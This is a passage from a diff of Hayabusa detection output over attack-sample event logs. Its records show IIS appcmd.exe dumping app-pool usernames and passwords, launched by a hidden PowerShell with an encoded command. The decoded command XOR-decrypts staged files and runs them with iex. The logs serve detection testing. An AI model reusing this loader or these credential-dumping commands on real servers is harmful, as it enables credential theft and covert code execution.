JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3100 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C92FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.432 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3136 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C96FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.522 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.662 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.742 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.822 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBj